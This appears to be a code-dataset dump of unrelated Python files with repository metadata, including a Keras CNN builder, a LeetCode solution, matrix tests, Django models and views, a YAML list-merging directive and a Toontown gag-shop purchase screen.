x = Conv1D(filters, kernel_size, padding='same', activation='relu')(x)
x = Conv1D(filters, kernel_size, padding='same')(x)
x = add([skip, x])
x = Activation('relu')(x)
    # x = BatchNormalization(axis=-1,trainable=False)(x)  # normalize each channel
x = MaxPooling1D(2)(x)
return x
def cnn(x, output_dim=8):
x = cnn_block(x, 8, (3,3))
x = cnn_block(x, 16, (3,3))
x = cnn_block(x, 32, (3,3))
    x = cnn_block(x, 64, (3,3))  # out: batch * width * height * channel
# x = cbam_block(x, ratio=8)
x = GlobalAveragePooling2D()(x)
    # x = Lambda(lambda x: K.max(x, axis=1, keepdims=False))(x)  # out: batch * height * channel
# x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(64, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(128, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(output_dim, activation='softmax')(x)
return x
def resnet(x, output_dim=8):
x = res_block(x, 8, 3)
x = res_block(x, 16, 3)
x = res_block(x, 32, 3)
x = res_block(x, 64, 3)
x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(128, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(256, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(output_dim, activation='softmax')(x)
return x
def model_creat(input_shape=(28, 28, 3), output_dim=8):
input_tensor = Input(shape=input_shape)
output_tensor = cnn(input_tensor, output_dim)
model = Model(inputs=[input_tensor], outputs=[output_tensor])
return model
if __name__ == '__main__':
model = model_creat(input_shape=(40, 216, 1), output_dim=50)
model.summary()
model.save('./model_struct/cnn_atten.h5')
|
[
"56808862+Grid-Gudx@users.noreply.github.com"
] |
56808862+Grid-Gudx@users.noreply.github.com
|
e680db738c872726585c93052f0caf654b612ac1
|
e7b7505c084e2c2608cbda472bc193d4a0153248
|
/LeetcodeNew/python2/LC_1432.py
|
84a5a75c9293ff45e21d69e289d5ee014eee0a6d
|
[] |
no_license
|
Taoge123/OptimizedLeetcode
|
8e5c1cd07904dfce1248bc3e3f960d2f48057a5d
|
3e50f6a936b98ad75c47d7c1719e69163c648235
|
refs/heads/master
| 2023-02-27T21:13:40.450089
| 2023-02-07T04:11:09
| 2023-02-07T04:11:09
| 170,044,224
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 927
|
py
|
class Solution:
def maxDiff(self, num: int) -> int:
num_string = str(num)
def change(src: str, dest: str, s: str):
return int(s.replace(src, dest))
# -----------------------------------------------------------
# digit replacement for maximum number
maxi = num
for char in num_string:
if char < '9':
maxi = change(char, '9', num_string)
break
# -----------------------------------------------------------
# digit replacement for minimum number
mini = num
if num_string[0] > '1':
# leading digit cannot be zero
mini = change(num_string[0], '1', num_string)
else:
for char in num_string[1:]:
if char > '1':
mini = change(char, '0', num_string)
break
return maxi - mini
|
[
"taocheng984@gmail.com"
] |
taocheng984@gmail.com
|
70b48dfafc9a4b13b1aa847ed8efe0c4f9c30f64
|
350ef2446bd8d4c23683a96673dfe0eb8ec232ea
|
/zjazd_4/Mathematica/tests/test_algebra.py
|
2e74683ebad360daca4e173f3226ba1d87469bb0
|
[] |
no_license
|
vorjat/PythonBootCamp
|
a6e758c13310bc9de5a76b2e67260971e5ad5807
|
d63dbc96b7d15ad6908828cf676f5fbc4a871c04
|
refs/heads/master
| 2020-03-31T02:51:24.230177
| 2018-12-02T15:44:07
| 2018-12-02T15:44:07
| 151,842,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 975
|
py
|
import pytest
from zjazd_4.Mathematica.algebra.matrices import add_matrices, sub_matrices
def test_add_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8, 9],
[10, 11, 12]
]
result = add_matrices(a, b)
assert result == [
[8, 10, 12],
[14, 16, 18]
]
def test_add_different_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8],
[10, 11]
]
with pytest.raises(ValueError):
add_matrices(a, b)
def test_sub_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8, 9],
[10, 11, 12]
]
result = sub_matrices(a, b)
assert result == [
[-6, -6, -6],
[-6, -6, -6]
]
def test_sub_different_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8],
[10, 11]
]
with pytest.raises(ValueError):
sub_matrices(a, b)
|
[
"przemyslaw.jarek@gmail.com"
] |
przemyslaw.jarek@gmail.com
|
c38ba3b864a46e77567726b65f31b71700254d4d
|
dcf076f397284659e0b4302bac33901b63e42319
|
/blog/views.py
|
aab81d370014d5c2ec86a9dc303b07680214b87c
|
[] |
no_license
|
ojudsonleo/Modle
|
7f6123c33013f62d72fa4fbfff3bfab00b96dd04
|
6cf0303023c910079f9a418af873934ada2b2286
|
refs/heads/main
| 2023-06-07T04:09:04.168910
| 2021-06-22T09:29:46
| 2021-06-22T09:29:46
| 378,587,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
from django.shortcuts import render
from django.views.generic import ListView, CreateView,DetailView,DeleteView
from .models import *
# def Blog(request):
# return render(request, "home.asp")
class Blog(ListView):
model = Post
template_name = "home.asp"
class ArticleDetailView(DeleteView):
model = Post
template_name = "article_detail.asp"
|
[
"ojudsonleo@gmail.com"
] |
ojudsonleo@gmail.com
|
8c7400085b75a92b05d0c7020226a30b186d9c51
|
af5ac397b5247b70ecd4c4d3c000eb8da3faf354
|
/custom_auth/models.py
|
49463b67f292af3111306923fa4fd4fdc1604560
|
[] |
no_license
|
rohithmada00/customAuthentication
|
023c978d5e588a7e4b36546884c7e1642672d54f
|
b9b4253d017c513bfb8af6d5d823ff76e1ed7b99
|
refs/heads/master
| 2022-12-05T15:39:33.958973
| 2020-08-30T12:45:37
| 2020-08-30T12:45:37
| 291,467,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,094
|
py
|
from django.db import models
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.base_user import AbstractBaseUser
from .managers import CLUserManager
class CLUser(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(unique=True)
first_name = models.CharField(max_length=40, blank=True)
last_name = models.CharField(max_length=40, blank=True)
profile_image_url = models.URLField(null=True, blank=True)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
date_joined = models.DateTimeField(auto_now_add=True)
objects = CLUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
def get_full_name(self):
'''
Returns the first_name plus the last_name, with a space in between.
'''
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
'''
Returns the short name for the user.
'''
return self.first_name
|
[
"noreply@github.com"
] |
rohithmada00.noreply@github.com
|
192c6d5d6351a005d2e9a348a7e5589587dad35f
|
102c082395547af278da95d2334b1ff13f5cf5c0
|
/romeo/lib/romeo/directives/merge_lists.py
|
3d250dd80af958f3491ff275ef08a5dd038f6010
|
[
"Apache-2.0"
] |
permissive
|
c0ns0le/droned
|
ad2690edb2f8f26f380ae7c58ea657a76c49fccf
|
c4b6a53e384cdb200baba48f6256abc48e052aca
|
refs/heads/master
| 2021-04-15T09:45:37.547708
| 2014-02-25T20:51:52
| 2014-02-25T20:51:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,736
|
py
|
###############################################################################
# Copyright 2006 to the present, Orbitz Worldwide, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
'''
Created on Jun 6, 2011
@author: cbrinley
'''
import re
from romeo.directives import Directive,DirectiveException
class PreMergeLists(Directive):
'''This directive merges multiple lists into one list.
    Recommended to be used with your parser's anchor
    or tag system. Here is a YAML example:
SERVER:
SERVICES: ${ROMEO.merge_lists *list1,*list2,*complex_type}
MYLIST: &list1
- item1
- item2
ANOTHER: &list2
- i3
- i4
output without this directive:
SERVER:
SERVICES: [ [item1,item2],[i3,i4],*complex_type]
output with this directive:
SERVER:
SERVICES: [item1,item2,i3,i4,{comple:type}]
'''
name = "merge_lists"
modes = ['pre']
repl_pattern = '["$<ROMEO.merge_lists %s>", %s]'
@classmethod
def init_kwargs(cls, preprocessor):
state = preprocessor.get_group_state("merge_lists")
return {"group_state":state}
def is_valid(self):
'''for this directive we have no extended validation.
we leave it up to the outer structured data parser
to determine if our arguments are valid.
'''
return
def apply(self):
'''pre side of this directive basically just
sets up some markers for the post side
of the directive. that's where the heavy
lifting is at.
#1 if we got this far we set state to true
so post side of directive can quickly
detect if we should continue processing.
'''
group_state = self.kwargs['group_state']
group_state[self.filename] = True #1
out = []
self.data.seek(0)
for line in self.get_lines():
m = self.used_pattern.search(line)
if not m:
out.append(line)
continue
args = ", ".join( self.extract_args(line[m.start():m.end()]) )
dirargs = ",".join( self.extract_args(line[m.start():m.end()]) )
repl = self.repl_pattern % (dirargs,args)
post_style_line = self.used_pattern.sub(repl,line,1)
out.append(post_style_line)
return "".join(out)
class PostMergeLists(Directive):
    '''Main logic is in merge_lists(); see its doc for details.
    See PreMergeLists for general directive notes.
'''
name = "merge_lists"
modes = ['post']
repl_pattern = '["$<ROMEO.merge_lists %s>", %s]'
@classmethod
def init_kwargs(cls, preprocessor):
state = preprocessor.get_group_state('merge_lists')
        marker = re.compile(r"\$\<ROMEO\.%s.*\>" % cls.name )
return {'group_state':state,
'marker': marker,
}
def is_used(self):
'''traversing the whole dom could be quite expensive
depending on how many tags and imports were used
in raw source file. Our "pre" cousin has given us
a way to check on the cheap.
'''
group_state = self.kwargs['group_state']
return self.filename in group_state
def is_valid(self):
'''for this directive we have no extended validation.
we leave it up to the outer structured data parser
to determine if our arguments are valid.
'''
return
def apply(self):
self.used_pattern = self.kwargs['marker']
td = type(self.data)
if td == list: self.try_list_iterate(self.data)
if td == dict: self.try_dict_iterate(self.data)
del self.kwargs['group_state'][self.filename]
return self.data
def try_dict_iterate(self,data):
for v in data.values():
if type(v) == list:
self.try_list_iterate(v)
if type(v) == dict:
self.try_dict_iterate(v)
def try_list_iterate(self,data):
#check list value 0
#if its our guy merge it pluss next N lists
#remove first N+1 lists
#insert merged list as ord 0
#iterate over list
head = data[0]
if type(head) == str and self.used_pattern.match(head):
self.merge_lists(data)
for i in data:
if type(i) == list:
self.try_list_iterate(i)
if type(i) == dict:
self.try_dict_iterate(i)
def merge_lists(self,data):
'''#1 figure out how many lists we should merge
this is == to number of args passed to directive.
#2 our total list len (of lists) must be at least as
long as the number of args to our directive.
#3 skip the directive string and get the arguments
to the directive which should be the next <minlen>
items in our parent list.
#4 in case not all the items in our parent were
themselves lists. make em lists.
#5 flatten out this list of lists [[1],[2]] -> [1,2]
#6 reverse our list so we have [2,1] and push these
values onto the front of our list.
'''
err0 = 'merge_lists failed. '
err0 += 'there are not enough input lists. '
err0 += 'expected %s found %s.'
head = data[0]
args = self.extract_args(head) #1
minlen = len(args) + 1
actlen = len(data)
if actlen < minlen: #2
msg = err0 % (minlen,actlen)
raise DirectiveException(msg)
to_merge = data[1:minlen] #3
for i in range(len(to_merge)): #4
if type(to_merge[i]) != list:
to_merge[i] = [to_merge[i]]
out = []
for l in to_merge: #5
for i in l:
out.append(i)
del data[:minlen]
out.reverse() #6
for i in out:
data.insert(0,i)
|
[
"justin.venus@orbitz.com"
] |
justin.venus@orbitz.com
|
da2506dbcd8bbd4a6af403ec8ad4fe380fbf367b
|
142c129a6712fb5b67415d2e3b2f18bf1fe83efe
|
/2019.03.21/회문1.py
|
30dc139546999ecd6088e70dda27ce9239ca35fb
|
[] |
no_license
|
ash92kr/TIL
|
03f0d4a664f7bbf641f23534ab6a4548dc68376c
|
0b0e42f5f7fca20143899efb3dd10907fa9890d5
|
refs/heads/master
| 2020-04-11T21:13:27.942570
| 2019-05-23T01:45:09
| 2019-05-23T01:45:09
| 162,098,959
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
import sys
sys.stdin = open("회문1_input.txt")
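# For each of 10 test cases: read the palindrome length N and an 8x8 character grid,
# then count every horizontal and vertical palindrome of length N.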
for tc in range(10):
N = int(input())
arr = [list(map(str, input())) for i in range(8)]
pal = 0
    # horizontal (rows)
for i in range(8):
for j in range(8-N+1):
flag = 1
for k in range(N//2):
if arr[i][j+k] != arr[i][j+N-1-k]:
flag = 0
break
if flag:
pal += 1
    # vertical (columns)
for i in range(8):
for j in range(8-N+1):
flag = 1
for k in range(N//2):
                if arr[j+k][i] != arr[j+N-1-k][i]:
                    flag = 0
                    break
if flag:
pal += 1
print("#{} {}".format(tc+1, pal))
|
[
"ash92kr@gmail.com"
] |
ash92kr@gmail.com
|
d4d8e4de325808fd6b97ad1ceddd2aa7572913b1
|
75f5f5429175ad50df86677f6ba1f09a0734d946
|
/jsonium/drivers/__init__.py
|
e70cddaefa2620eef3eb418df992347c3901a191
|
[
"MIT"
] |
permissive
|
pombredanne/jsonium
|
819c6c80bdcaf9e47a9788aa4c6fcfb46233c56a
|
3830945f7a4f8b29892158d5bfdcbf3426a21a24
|
refs/heads/master
| 2021-01-25T11:49:47.061555
| 2017-03-20T01:26:15
| 2017-03-20T01:26:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from jsonium.drivers.file import FileDriver
from jsonium.drivers.memory import MemoryDriver
from jsonium.drivers.factory import DriverFactory
|
[
"ertugkeremoglu@gmail.com"
] |
ertugkeremoglu@gmail.com
|
cb7cf8108dc3d3578c84139188ed4476a67e35a8
|
6be1990abf99c85ef886b49dcea1824aabb648d3
|
/weixinofneolocal/weixinofneolocal/libs/PIL/ImageGL.py
|
279f3a32838f0e24f55fca3a9c41db50b3c92cff
|
[] |
no_license
|
neoguojing/cloudServer
|
b53ae205efe52cf0aea28dbb9e6c16c20caf991f
|
7c19101789b0c46474269e4c8fe00e92203e9cd7
|
refs/heads/master
| 2020-12-04T23:02:23.551479
| 2017-09-22T03:08:35
| 2017-09-22T03:08:35
| 67,382,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 487
|
py
|
#
# The Python Imaging Library.
# $Id$
#
# OpenGL pixmap/texture interface (requires imToolkit OpenGL extensions)
#
# History:
# 2003-09-13 fl Added
#
# Copyright (c) Secret Labs AB 2003.
#
# See the README file for information on usage and redistribution.
#
##
# OpenGL pixmap/texture interface (requires imToolkit OpenGL
# extensions.)
##
import _imaginggl
##
# Texture factory.
class TextureFactory:
pass # overwritten by the _imaginggl module
from _imaginggl import *
|
[
"guojing_neo@163.com"
] |
guojing_neo@163.com
|
73f31707e7cdcddd3cec84f232c01508f2c17ff7
|
a949c2083ce543874481d2feb07f27bc1301d1f8
|
/django_project/blog/migrations/0002_post_image.py
|
02d2d4d94c700cec4fc48573787411674d9b58fa
|
[] |
no_license
|
rdx910/Projects
|
76ee94bc66a658049c15fd3feb3bed9924b504fc
|
9a6c863485010d34639fefc364e1c0903530d068
|
refs/heads/master
| 2021-01-16T12:31:24.189506
| 2020-06-07T17:52:33
| 2020-06-07T17:52:33
| 243,122,589
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 436
|
py
|
# Generated by Django 3.0.6 on 2020-06-04 21:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='', verbose_name='blog/images'),
),
]
|
[
"noreply@github.com"
] |
rdx910.noreply@github.com
|
018f37ee6f1adac597034d8f4b414225d4c93b3a
|
ba0cbdae81c171bd4be7b12c0594de72bd6d625a
|
/MyToontown/Toontown2016/toontown/minigame/Purchase.py
|
478d19849772f06b8159fff787fc2746a0980349
|
[] |
no_license
|
sweep41/Toontown-2016
|
65985f198fa32a832e762fa9c59e59606d6a40a3
|
7732fb2c27001264e6dd652c057b3dc41f9c8a7d
|
refs/heads/master
| 2021-01-23T16:04:45.264205
| 2017-06-04T02:47:34
| 2017-06-04T02:47:34
| 93,279,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35,143
|
py
|
from PurchaseBase import *
from otp.nametag.NametagFloat2d import *
from otp.nametag import NametagGlobals
from direct.task.Task import Task
from toontown.toon import ToonHead
from toontown.toonbase import ToontownTimer
from direct.gui import DirectGuiGlobals as DGG
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import Functor
from toontown.minigame import TravelGameGlobals
from toontown.distributed import DelayDelete
from toontown.toonbase import ToontownGlobals
import MinigameGlobals
COUNT_UP_RATE = 0.15
COUNT_UP_DURATION = 0.5
DELAY_BEFORE_COUNT_UP = 1.0
DELAY_AFTER_COUNT_UP = 1.0
COUNT_DOWN_RATE = 0.075
COUNT_DOWN_DURATION = 0.5
DELAY_AFTER_COUNT_DOWN = 0.0
DELAY_AFTER_CELEBRATE = 2.6
COUNT_SFX_MIN_DELAY = 0.034
COUNT_SFX_START_T = 0.079
OVERMAX_SFX_MIN_DELAY = 0.067
OVERMAX_SFX_START_T = 0.021
class Purchase(PurchaseBase):
notify = DirectNotifyGlobal.directNotify.newCategory('Purchase')
def __init__(self, toon, pointsArray, playerMoney, ids, states, remain, doneEvent, metagameRound = -1, votesArray = None):
PurchaseBase.__init__(self, toon, doneEvent)
self.ids = ids
self.pointsArray = pointsArray
self.playerMoney = playerMoney
self.states = states
self.remain = remain
self.tutorialMode = 0
self.metagameRound = metagameRound
self.votesArray = votesArray
self.voteMultiplier = 1
self.fsm.addState(State.State('reward', self.enterReward, self.exitReward, ['purchase']))
doneState = self.fsm.getStateNamed('done')
doneState.addTransition('reward')
self.unexpectedEventNames = []
self.unexpectedExits = []
self.setupUnexpectedExitHooks()
def load(self):
purchaseModels = loader.loadModel('phase_4/models/gui/purchase_gui')
PurchaseBase.load(self, purchaseModels)
interiorPhase = 3.5
self.bg = loader.loadModel('phase_%s/models/modules/toon_interior' % interiorPhase)
self.bg.setPos(0.0, 5.0, -1.0)
self.wt = self.bg.find('**/random_tc1_TI_wallpaper')
wallTex = loader.loadTexture('phase_%s/maps/wall_paper_a5.jpg' % interiorPhase)
self.wt.setTexture(wallTex, 100)
self.wt.setColorScale(0.8, 0.67, 0.549, 1.0)
self.bt = self.bg.find('**/random_tc1_TI_wallpaper_border')
wallTex = loader.loadTexture('phase_%s/maps/wall_paper_a5.jpg' % interiorPhase)
self.bt.setTexture(wallTex, 100)
self.bt.setColorScale(0.8, 0.67, 0.549, 1.0)
self.wb = self.bg.find('**/random_tc1_TI_wainscotting')
wainTex = loader.loadTexture('phase_%s/maps/wall_paper_b4.jpg' % interiorPhase)
self.wb.setTexture(wainTex, 100)
self.wb.setColorScale(0.473, 0.675, 0.488, 1.0)
self.playAgain = DirectButton(parent=self.frame, relief=None, scale=1.04, pos=(0.72, 0, -0.24), image=(purchaseModels.find('**/PurchScrn_BTN_UP'),
purchaseModels.find('**/PurchScrn_BTN_DN'),
purchaseModels.find('**/PurchScrn_BTN_RLVR'),
purchaseModels.find('**/PurchScrn_BTN_UP')), text=TTLocalizer.GagShopPlayAgain, text_fg=(0, 0.1, 0.7, 1), text_scale=0.05, text_pos=(0, 0.015, 0), image3_color=Vec4(0.6, 0.6, 0.6, 1), text3_fg=Vec4(0, 0, 0.4, 1), command=self.__handlePlayAgain)
self.backToPlayground = DirectButton(parent=self.frame, relief=None, scale=1.04, pos=(0.72, 0, -0.045), image=(purchaseModels.find('**/PurchScrn_BTN_UP'),
purchaseModels.find('**/PurchScrn_BTN_DN'),
purchaseModels.find('**/PurchScrn_BTN_RLVR'),
purchaseModels.find('**/PurchScrn_BTN_UP')), text=TTLocalizer.GagShopBackToPlayground, text_fg=(0, 0.1, 0.7, 1), text_scale=0.05, text_pos=(0, 0.015, 0), image3_color=Vec4(0.6, 0.6, 0.6, 1), text3_fg=Vec4(0, 0, 0.4, 1), command=self.__handleBackToPlayground)
self.timer = ToontownTimer.ToontownTimer()
self.timer.hide()
self.timer.posInTopRightCorner()
numAvs = 0
count = 0
localToonIndex = 0
for index in xrange(len(self.ids)):
avId = self.ids[index]
if avId == base.localAvatar.doId:
localToonIndex = index
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE:
numAvs = numAvs + 1
layoutList = (None,
(0,),
(0, 2),
(0, 1, 3),
(0, 1, 2, 3))
layout = layoutList[numAvs]
headFramePosList = (Vec3(0.105, 0, -0.384),
Vec3(0.105, 0, -0.776),
Vec3(0.85, 0, -0.555),
Vec3(-0.654, 0, -0.555))
AVID_INDEX = 0
LAYOUT_INDEX = 1
TOON_INDEX = 2
self.avInfoArray = [(base.localAvatar.doId, headFramePosList[0], localToonIndex)]
pos = 1
for index in xrange(len(self.ids)):
avId = self.ids[index]
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE:
if avId != base.localAvatar.doId:
if base.cr.doId2do.has_key(avId):
self.avInfoArray.append((avId, headFramePosList[layout[pos]], index))
pos = pos + 1
self.headFrames = []
for avInfo in self.avInfoArray:
av = base.cr.doId2do.get(avInfo[AVID_INDEX])
if av:
headFrame = PurchaseHeadFrame(av, purchaseModels)
headFrame.setAvatarState(self.states[avInfo[TOON_INDEX]])
headFrame.setPos(avInfo[LAYOUT_INDEX])
self.headFrames.append((avInfo[AVID_INDEX], headFrame))
purchaseModels.removeNode()
self.foreground = loader.loadModel('phase_3.5/models/modules/TT_A1')
self.foreground.setPos(12.5, -20, -5.5)
self.foreground.setHpr(180, 0, 0)
self.backgroundL = self.foreground.copyTo(hidden)
self.backgroundL.setPos(-12.5, -25, -5)
self.backgroundL.setHpr(180, 0, 0)
self.backgroundR = self.backgroundL.copyTo(hidden)
self.backgroundR.setPos(25, -25, -5)
self.backgroundR.setHpr(180, 0, 0)
streets = loader.loadModel('phase_3.5/models/modules/street_modules')
sidewalk = streets.find('**/street_sidewalk_40x40')
self.sidewalk = sidewalk.copyTo(hidden)
self.sidewalkR = sidewalk.copyTo(hidden)
self.sidewalkL = sidewalk.copyTo(hidden)
self.sidewalk.setPos(-20, -25, -5.5)
self.sidewalk.setColor(0.9, 0.6, 0.4)
self.sidewalkL.setPos(-40, -25, -5.5)
self.sidewalkL.setColor(0.9, 0.6, 0.4)
self.sidewalkR.setPos(0, -25, -5.5)
self.sidewalkR.setColor(0.9, 0.6, 0.4)
streets.removeNode()
doors = loader.loadModel('phase_4/models/modules/doors')
door = doors.find('**/door_single_square_ur_door')
self.door = door.copyTo(hidden)
self.door.setH(180)
self.door.setPos(0, -16.75, -5.5)
self.door.setScale(1.5, 1.5, 2.0)
self.door.setColor(1.0, 0.8, 0, 1)
doors.removeNode()
self.convertingVotesToBeansLabel = DirectLabel(text=TTLocalizer.TravelGameConvertingVotesToBeans, text_fg=VBase4(1, 1, 1, 1), relief=None, pos=(0.0, 0, -0.58), scale=0.075)
self.convertingVotesToBeansLabel.hide()
self.rewardDoubledJellybeanLabel = DirectLabel(text=TTLocalizer.PartyRewardDoubledJellybean, text_fg=(1.0, 0.125, 0.125, 1.0), text_shadow=(0, 0, 0, 1), relief=None, pos=(0.0, 0, -0.67), scale=0.08)
self.rewardDoubledJellybeanLabel.hide()
self.countSound = base.loader.loadSfx('phase_3.5/audio/sfx/tick_counter.ogg')
self.overMaxSound = base.loader.loadSfx('phase_3.5/audio/sfx/AV_collision.ogg')
self.celebrateSound = base.loader.loadSfx('phase_4/audio/sfx/MG_win.ogg')
return
def unload(self):
PurchaseBase.unload(self)
self.cleanupUnexpectedExitHooks()
self.bg.removeNode()
del self.bg
self.notify.debug('destroying head frames')
for headFrame in self.headFrames:
if not headFrame[1].isEmpty():
headFrame[1].reparentTo(hidden)
headFrame[1].destroy()
del self.headFrames
self.playAgain.destroy()
del self.playAgain
self.backToPlayground.destroy()
del self.backToPlayground
self.timer.stop()
self.timer.destroy()
del self.timer
for counter in self.counters:
counter.destroy()
del counter
del self.counters
for total in self.totalCounters:
total.destroy()
del total
del self.totalCounters
loader.unloadModel('phase_3.5/models/modules/TT_A1')
loader.unloadModel('phase_3.5/models/modules/street_modules')
loader.unloadModel('phase_4/models/modules/doors')
taskMgr.remove('countUpTask')
taskMgr.remove('countVotesUpTask')
taskMgr.remove('countDownTask')
taskMgr.remove('countVotesDownTask')
taskMgr.remove('celebrate')
taskMgr.remove('purchase-trans')
taskMgr.remove('delayAdd')
taskMgr.remove('delaySubtract')
self.foreground.removeNode()
del self.foreground
self.backgroundL.removeNode()
del self.backgroundL
self.backgroundR.removeNode()
del self.backgroundR
self.sidewalk.removeNode()
self.sidewalkL.removeNode()
self.sidewalkR.removeNode()
del self.sidewalk
del self.sidewalkL
del self.sidewalkR
self.door.removeNode()
del self.door
self.collisionFloor.removeNode()
del self.collisionFloor
del self.countSound
del self.celebrateSound
self.convertingVotesToBeansLabel.removeNode()
self.rewardDoubledJellybeanLabel.removeNode()
del self.convertingVotesToBeansLabel
del self.rewardDoubledJellybeanLabel
def showStatusText(self, text):
self.statusLabel['text'] = text
taskMgr.remove('resetStatusText')
taskMgr.doMethodLater(2.0, self.resetStatusText, 'resetStatusText')
def resetStatusText(self, task):
self.statusLabel['text'] = ''
return Task.done
def __handlePlayAgain(self):
for headFrame in self.headFrames:
headFrame[1].wrtReparentTo(aspect2d)
self.toon.inventory.reparentTo(hidden)
self.toon.inventory.hide()
taskMgr.remove('resetStatusText')
taskMgr.remove('showBrokeMsgTask')
self.statusLabel['text'] = TTLocalizer.GagShopWaitingOtherPlayers
messenger.send('purchasePlayAgain')
def handleDone(self, playAgain):
base.localAvatar.b_setParent(ToontownGlobals.SPHidden)
if playAgain:
self.doneStatus = {'loader': 'minigame',
'where': 'minigame'}
else:
self.doneStatus = {'loader': 'safeZoneLoader',
'where': 'playground'}
messenger.send(self.doneEvent)
def __handleBackToPlayground(self):
self.toon.inventory.reparentTo(hidden)
self.toon.inventory.hide()
messenger.send('purchaseBackToToontown')
def __timerExpired(self):
messenger.send('purchaseTimeout')
def findHeadFrame(self, id):
for headFrame in self.headFrames:
if headFrame[0] == id:
return headFrame[1]
return None
def __handleStateChange(self, playerStates):
self.states = playerStates
for avInfo in self.avInfoArray:
index = avInfo[2]
headFrame = self.findHeadFrame(avInfo[0])
state = self.states[index]
headFrame.setAvatarState(state)
def enter(self):
base.playMusic(self.music, looping=1, volume=0.8)
self.fsm.request('reward')
def enterReward(self):
numToons = 0
toonLayouts = ((2,),
(1, 3),
(0, 2, 4),
(0, 1, 3, 4))
toonPositions = (5.0,
1.75,
-0.25,
-1.75,
-5.0)
self.toons = []
self.toonsKeep = []
self.counters = []
self.totalCounters = []
camera.reparentTo(render)
camera.setPos(0, 16.0, 2.0)
camera.lookAt(0, 0, 0.75)
base.transitions.irisIn(0.4)
base.camLens.setMinFov(60/(4./3.))
base.setBackgroundColor(Vec4(0, 0.6, 1, 1))
self.title.reparentTo(aspect2d)
self.foreground.reparentTo(render)
self.backgroundL.reparentTo(render)
self.backgroundR.reparentTo(render)
self.sidewalk.reparentTo(render)
self.sidewalkL.reparentTo(render)
self.sidewalkR.reparentTo(render)
self.door.reparentTo(render)
size = 20
z = -2.5
floor = CollisionPolygon(Point3(-size, -size, z), Point3(size, -size, z), Point3(size, size, z), Point3(-size, size, z))
floor.setTangible(1)
floorNode = CollisionNode('collision_floor')
floorNode.addSolid(floor)
self.collisionFloor = render.attachNewNode(floorNode)
NametagGlobals.setOnscreenChatForced(1)
for index in xrange(len(self.ids)):
avId = self.ids[index]
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE and avId in base.cr.doId2do:
numToons += 1
toon = base.cr.doId2do[avId]
toon.stopSmooth()
self.toons.append(toon)
self.toonsKeep.append(DelayDelete.DelayDelete(toon, 'Purchase.enterReward'))
counter = DirectLabel(parent=hidden, relief=None, pos=(0.0, 0.0, 0.0), text=str(0), text_scale=0.2, text_fg=(0.95, 0.95, 0, 1), text_pos=(0, -0.1, 0), text_font=ToontownGlobals.getSignFont())
counter['image'] = DGG.getDefaultDialogGeom()
counter['image_scale'] = (0.33, 1, 0.33)
counter.setScale(0.5)
counter.count = 0
counter.max = self.pointsArray[index]
self.counters.append(counter)
money = self.playerMoney[index]
totalCounter = DirectLabel(parent=hidden, relief=None, pos=(0.0, 0.0, 0.0), text=str(money), text_scale=0.2, text_fg=(0.95, 0.95, 0, 1), text_pos=(0, -0.1, 0), text_font=ToontownGlobals.getSignFont(), image=self.jarImage)
totalCounter.setScale(0.5)
totalCounter.count = money
totalCounter.max = toon.getMaxMoney()
self.totalCounters.append(totalCounter)
self.accept('clientCleanup', self._handleClientCleanup)
pos = 0
toonLayout = toonLayouts[numToons - 1]
for toon in self.toons:
thisPos = toonPositions[toonLayout[pos]]
toon.setPos(Vec3(thisPos, 1.0, -2.5))
toon.setHpr(Vec3(0, 0, 0))
toon.setAnimState('neutral', 1)
toon.setShadowHeight(0)
if not toon.isDisabled():
toon.reparentTo(render)
self.counters[pos].setPos(thisPos * -0.17, 0, toon.getHeight() / 10 + 0.25)
self.counters[pos].reparentTo(aspect2d)
self.totalCounters[pos].setPos(thisPos * -0.17, 0, -0.825)
self.totalCounters[pos].reparentTo(aspect2d)
pos += 1
self.maxPoints = max(self.pointsArray)
if self.votesArray:
self.maxVotes = max(self.votesArray)
numToons = len(self.toons)
